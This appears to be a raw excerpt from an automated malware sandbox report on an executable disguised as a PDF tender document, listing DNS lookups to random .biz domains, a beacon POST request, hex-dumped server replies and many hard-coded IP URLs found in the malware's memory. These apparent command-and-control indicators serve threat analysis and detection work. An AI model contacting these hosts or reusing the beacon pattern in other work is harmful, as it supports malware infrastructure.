Source: global traffic	DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic	DNS traffic detected: DNS query: xccjj.biz
Source: global traffic	DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic	DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic	DNS traffic detected: DNS query: uaafd.biz
Source: global traffic	DNS traffic detected: DNS query: eufxebus.biz
Source: global traffic	DNS traffic detected: DNS query: www.leadmagnetkpis.shop
Source: global traffic	DNS traffic detected: DNS query: www.publicblockchain.xyz

Source: unknown

HTTP traffic detected: POST /otmedx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:04:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:04:57 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:05:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:05:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 13 Mar 2025 12:05:24 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 13 Mar 2025 12:05:24 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/
Source: armsvc.exe, 00000001.00000003.1561292398.0000000000707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/2
Source: armsvc.exe, 00000001.00000003.1561759066.0000000000714000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561292398.0000000000711000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/ljleu
Source: armsvc.exe, 00000001.00000003.1561759066.0000000000714000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561292398.0000000000711000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/ljleut6
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/mrnvptiyhruij
Source: armsvc.exe, 00000001.00000003.1829501844.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1876964528.0000000000758000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1868762894.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844453947.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859970243.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1820877502.0000000000746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/mrnvptiyhruijAcrobat
Source: armsvc.exe, 00000001.00000003.1876964528.0000000000758000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1868762894.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859970243.0000000000745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/pbepstjyjitC
Source: armsvc.exe, 00000001.00000003.1696600624.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20/
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://165.160.15.20/ytedfhxqcjbfitqi
Source: armsvc.exe, 00000001.00000003.1583611733.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1860281118.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000003.00000002.1179809856.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000002.1320303145.0000000000B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: mouslingly.exe, 00000016.00000002.1320303145.0000000000B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/2
Source: mouslingly.exe, 00000003.00000002.1179809856.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/g
Source: mouslingly.exe, 00000003.00000002.1179809856.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000003.00000002.1180220128.0000000000D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/mlblrfhjcmrnqnv
Source: mouslingly.exe, 00000003.00000002.1180220128.0000000000D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/mlblrfhjcmrnqnv&
Source: mouslingly.exe, 00000016.00000002.1320303145.0000000000B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/s
Source: mouslingly.exe, 00000016.00000002.1320303145.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000002.1321224450.0000000000B74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/xeorsulw
Source: armsvc.exe, 00000001.00000003.1186112945.0000000000714000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/xrrxkd
Source: mouslingly.exe, 00000003.00000002.1179809856.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/mlblrfhjcmrnqnv
Source: mouslingly.exe, 00000016.00000002.1320303145.0000000000B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/xeorsulw
Source: armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1656783636.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/
Source: armsvc.exe, 00000001.00000003.1583611733.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1618316519.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1568048824.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1605524611.0000000000735000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/P
Source: armsvc.exe, 00000001.00000003.1568593914.0000000000715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/wpgcvvhma
Source: armsvc.exe, 00000001.00000003.1568593914.0000000000715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/wpgcvvhmaO
Source: armsvc.exe, 00000001.00000003.1568593914.0000000000715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/wpgcvvhmaw
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/
Source: armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1680075627.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/6
Source: armsvc.exe, 00000001.00000003.1680075627.0000000000715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/cvfuovkrbl
Source: armsvc.exe, 00000001.00000003.1680075627.0000000000715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34/cvfuovkrbli
Source: armsvc.exe, 00000001.00000003.1876964528.0000000000758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.94.10.34:80/sbiwqdeyB
Source: armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.227.7.138/
Source: armsvc.exe, 00000001.00000003.1618316519.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1648767341.000000000072D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.246.200.160/qcjpf
Source: armsvc.exe, 00000001.00000003.1583611733.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1545652051.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1568048824.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1561071676.0000000000736000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1545823203.0000000000707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/
Source: armsvc.exe, 00000001.00000003.1545823203.0000000000707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/2
Source: armsvc.exe, 00000001.00000003.1844453947.0000000000744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/akhvxcouasoye
Source: armsvc.exe, 00000001.00000003.1545823203.0000000000707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/soqq
Source: armsvc.exe, 00000001.00000003.1876964528.0000000000758000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1868762894.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844453947.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859970243.0000000000745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212:80/akhvxcouasoye
Source: mouslingly.exe, 00000016.00000002.1320303145.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000002.1320303145.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/
Source: armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821195919.000000000072E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1790576666.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/$
Source: mouslingly.exe, 00000016.00000002.1321224450.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/=
Source: mouslingly.exe, 00000003.00000002.1180110483.0000000000D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/bfmkxghefe
Source: mouslingly.exe, 00000003.00000002.1180110483.0000000000D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/bfmkxghefe~hj
Source: Supply Tender documents PDF.exe, 00000000.00000002.1159992455.0000000000C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/d
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1714466779.000000000072D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1714917562.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1705474251.0000000000732000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1711817854.0000000000732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/dgbaojvdphepe
Source: mouslingly.exe, 00000003.00000002.1180110483.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000002.1321224450.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/l
Source: mouslingly.exe, 00000016.00000002.1321224450.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/o
Source: armsvc.exe, 00000001.00000003.1171969862.0000000000713000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/otmedx
Source: armsvc.exe, 00000001.00000003.1664416734.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/pytoqscgrrqg
Source: armsvc.exe, 00000001.00000003.1869487675.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1877884930.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/
Source: armsvc.exe, 00000001.00000003.1829501844.000000000072F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844783205.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/$
Source: armsvc.exe, 00000001.00000003.1886386196.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/hehuxfgxngeapgi
Source: armsvc.exe, 00000001.00000003.1868762894.000000000077A000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869950506.000000000077B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1876964528.000000000077A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133/poxjlsdujgwqdm
Source: armsvc.exe, 00000001.00000003.1829501844.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1876964528.0000000000758000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1868762894.0000000000745000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1844453947.0000000000746000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859970243.0000000000745000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.26.80.133:80/cpswkmvdqgso%
